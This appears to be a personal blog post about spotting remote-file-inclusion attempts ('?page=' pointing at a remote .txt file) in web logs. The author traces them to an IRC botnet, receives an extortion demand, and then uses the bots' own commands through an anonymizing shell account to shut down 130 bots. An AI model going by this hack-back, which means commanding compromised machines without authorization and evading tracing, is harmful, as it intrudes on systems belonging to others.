Web Bots
Since I have started this blog, I have been watching the logs of the website too see how many visitors come and go. I kept noticing that there was a lot of traffic to a page in the site that doesn’t exist any longer. The page used to exist, because I had allowed a World of Warcraft guild to use my hosting company and domain to host a website.
My first thought was that they had signed up for some service that automatically collected DKP (a WoW Guild thing) and displayed it somewhere else…because honestly, why would people continue linking to the same page if there wasn’t anything there? I figured that I would try to track down this “service” and see if I could get them to remove the page from their site.
Whenever one of these entries appeared in my log, they would be followed with something like ?page=http://theirwebsite/directory/txtFile.txt. So, I went to that web address, and got back a perl script. Just from the variables in the first part of the file, I could tell that the script would be connecting to a IRC server. It had a server address, port, server password, channel name, channel password, and then a few other things that I didn’t know what they were.
I connected to the IRC server and entered the channel, and quickly realized that I had stumbled into a bot network. I tried talking in the channel (at this point, I was going to stick to my original story) but I didn’t have a voice. So I messaged the only real looking name in the room. He didn’t respond. Figuring maybe they were on different timezones, I just quit the server and went about my business.
Of course then I decided to start looking at the script and seeing what it would do. I quickly discovered that it would accept commands from anyone in the room. The only thing you had to do was type “.user [password]” to authenticate yourself as its master. The password was right there in the file too. So I logged back on to the server, and into the channel just in time to see two people in the room copying and pasting my earlier private messages (where I was basically asking if they could remove me from their list).
I messaged him again, and they gave me a voice in the channel. I started explaining how I found them, and how I wanted them to remove me from their list. They then started telling me how I needed to pay them $1,000 USD, or they would shut me down for several days. To that threat, I simply responded “OH NOES!! You are going to take down my blog!?!” After that, “stupid american” things started flying out of them, and crap like that.
That just motivated me. I didn’t know if the commands I found would work or not, and didn’t get a chance to find out on them because I had logged in from my house. I found another bot network, and logged on through another shell account that would make it a little harder for me to be traced (like I said, I get bombarded with these attempted website hacks daily…I have a large list of scripts to choose from). When I got into this channel, there were 130 bots in there. I typed “.user [password]” and instantly all 130 of them reply in the channel with something like “User Accepted.” I then type “.dns” and “.info” and they all respond.
Then I typed “.die” and a great feeling rushed over me as 130 clients disconnected. Then the only other person left in the channel said something to me that was in Spanish…the only word I could comprehend was the last…which was clearly a curse word. I responded with “?”. I stuck around for a while to see how quickly they would come back online. After 5 minutes, only 2 clients joined the channel, and it could be assumed that those were new clients and the old clients just completely stopped running their script.
Then I went to the “stupid american” haters and showed them I wasn’t so stupid (the only difference is I had to /msg each and every bot since the channel was moderated and I didn’t have a voice). I fully expect my Internet to come to a grinding halt soon, or for my website to go offline. The only thought that comforts me is knowing that they are probably just little script kiddies that weren’t smart enough to do some form of encryption. There are quite a few scripts that I have found that at least have the majority of their script gdeflated with little just a small amount of code actually visible to re-inflate it. So far I’m just too lazy to re-inflate them myself. I probably just shouldn’t mess with them…they might be smart enough to do something about it.